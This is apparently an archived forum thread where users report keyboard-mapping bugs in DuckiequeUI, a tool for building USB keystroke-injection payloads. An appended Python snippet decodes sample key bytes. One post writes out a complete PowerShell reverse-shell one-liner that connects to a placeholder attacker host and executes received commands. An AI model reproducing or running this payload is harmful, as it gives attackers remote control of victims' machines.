kdodge Posted March 28, 2021

[deleted]

Scout Posted April 7, 2021

Hey I am using the tool now, but I am seeing an odd issue. My payload is using "=" but they are being typed as "+". Do you know what might be causing this?

chrizree Posted April 7, 2021

What language is your "victim" using and what language have you specified when creating the inject.bin file? What's the result if you use the payload ducky code and encode it with an official tool, same thing?

Scout Posted April 7, 2021

The language is set to default, but I also set it to US. I don't think it's an issue with the Duckyscript, rather how the DuckiequeUI tool is handling the "=". I was poking around the source code and I guess there is a tricky thing around the Windows API and the "=". The author listed a TODO around having to figure out how to get around this issue. I am not strong enough with Windows APIs or CPP to even begin to help with a solution though.

chrizree Posted April 7, 2021

It's nothing I will spend any time on either, I'm perfectly OK with using an ordinary text editor and the official tools in order to create ducky payload scripts and encoded files.

Scout Posted April 8, 2021

18 hours ago, chrizree said:
> It's nothing I will spend any time on either, I'm perfectly OK with using an ordinary text editor and the official tools in order to create ducky payload scripts and encoded files.

If you read my original post then you know that I was looking for another workflow, and that I was unhappy with debugging using official tools. DuckiequeUI seemed to fit my needs perfectly, which is why I was so invested in resolving this bug.

13 hours ago, kdodge said:
> I have fixed the problem of + for =. Thank you for discovering it!

You are awesome! I am going to try downloading this and working with it today. I will report back. Are you planning to update the repo with a new release? Otherwise I will compile it myself.

Scout Posted April 8, 2021

1 minute ago, Scout said:
> Are you planning to update the repo with a new release? Otherwise I will compile it myself.

Scratch that, you already did. And it is working! Thanks again for this great tool and being so quick to fix it.

Scout Posted April 8, 2021

Hey so I found one more bug--it looks like on Windows it doesn't like the "|" and renders just a "?". I also found that when I script "\" it is typed out as a "/". This is interesting because both symbols are on the same button on my keyboard. For reference, I am trying to run the following simple one-liner reverse shell PowerShell payload:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attackerIP',attackerPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Again, sorry I can't help to contribute, but I will sure be a tester! Ha!

Scout Posted April 12, 2021

On 4/8/2021 at 3:11 PM, kdodge said:
> Yep, I got the slash and backslash keys reversed. Thank you. New version is up.

Rad--and I like the new sidebar! That's nice for quickly adding common actions.

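
Added example (not from the thread and not DuckiequeUI's code): on a US layout "=" and "+" share one key, as do "\" and "|", so a wrong usage ID or Shift bit in an encoded file shows up as exactly this kind of substitution. The Python below assumes inject.bin stores two bytes per keystroke (USB HID usage ID, then modifier byte, with a 0x00 usage ID marking a delay) and decodes constructed sample bytes to compare them with the intended text; the function names are hypothetical.

```python
# Added illustration, not DuckiequeUI code. Assumed inject.bin layout:
# two bytes per keystroke, USB HID usage ID then modifier byte; a 0x00
# usage ID marks a delay entry and types nothing.
SHIFT_BITS = 0x02 | 0x20  # left and right Shift in the HID modifier byte

# US layout: usage ID -> (unshifted, shifted) for the keys from the thread.
US_KEYS = {
    0x2E: ("=", "+"),
    0x31: ("\\", "|"),
    0x38: ("/", "?"),
}
# Letters a-z occupy usage IDs 0x04..0x1D.
US_KEYS.update({0x04 + i: (chr(97 + i), chr(65 + i)) for i in range(26)})


def decode_pairs(blob: bytes) -> str:
    """Return the text a US-layout host would receive from the pairs."""
    typed = []
    for i in range(0, len(blob) - 1, 2):
        usage, modifier = blob[i], blob[i + 1]
        if usage == 0x00:  # delay entry, nothing is typed
            continue
        plain, shifted = US_KEYS.get(usage, ("\ufffd", "\ufffd"))
        typed.append(shifted if modifier & SHIFT_BITS else plain)
    return "".join(typed)


def mismatches(intended: str, blob: bytes):
    """List (index, wanted, typed) wherever the encoding differs."""
    typed = decode_pairs(blob)
    diffs = [(i, w, t) for i, (w, t) in enumerate(zip(intended, typed)) if w != t]
    if len(typed) != len(intended):
        diffs.append((min(len(typed), len(intended)), "<length>", str(len(typed))))
    return diffs


# Constructed sample data for the harmless string a=b|c\d
INTENDED = "a=b|c\\d"
GOOD = bytes([0x04, 0, 0x2E, 0, 0x05, 0, 0x31, 2, 0x06, 0, 0x31, 0, 0x07, 0])
# Constructed to type the wrong characters reported in the thread.
BAD = bytes([0x04, 0, 0x2E, 2, 0x05, 0, 0x38, 2, 0x06, 0, 0x38, 0, 0x07, 0])

if __name__ == "__main__":
    print(decode_pairs(GOOD), mismatches(INTENDED, GOOD))
    print(decode_pairs(BAD), mismatches(INTENDED, BAD))
```

The same decode-and-compare step works as a regression check on any encoder's output before it is written to a device, and for reading back a file recovered from one.
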
This topic is now archived and is closed to further replies.